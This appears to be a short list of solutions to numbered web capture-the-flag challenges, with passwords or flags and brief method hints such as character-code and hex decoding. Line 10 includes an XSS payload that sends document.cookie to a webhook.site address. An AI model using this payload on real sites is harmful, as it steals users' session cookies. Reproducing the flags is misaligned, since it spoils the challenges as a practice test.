1 HTMLCantStopYou
2 sh.org
3 123456azerty
4 HIDDEN
5 cpasbiendurpassword
6 hDufjdki156          (String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54))
7 toto123lol            (.toString())
8 BecauseSourceMapsAreGreatForDebuggingButNotForProduction         (sourcemapping)
9 786OsErtk12     (décodé la chaine de nombre en exa puis ASCCI)
10 NkI9qe4cdLIO2P7MIsWS8ofD6                            (<script>window.location = 'https://webhook.site/8912b373-37d7-447d-9143-fabd696f6c81?' + encodeURIComponent(document.cookie);</script>)
11 g00d_j0b_easy_deobfuscation
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
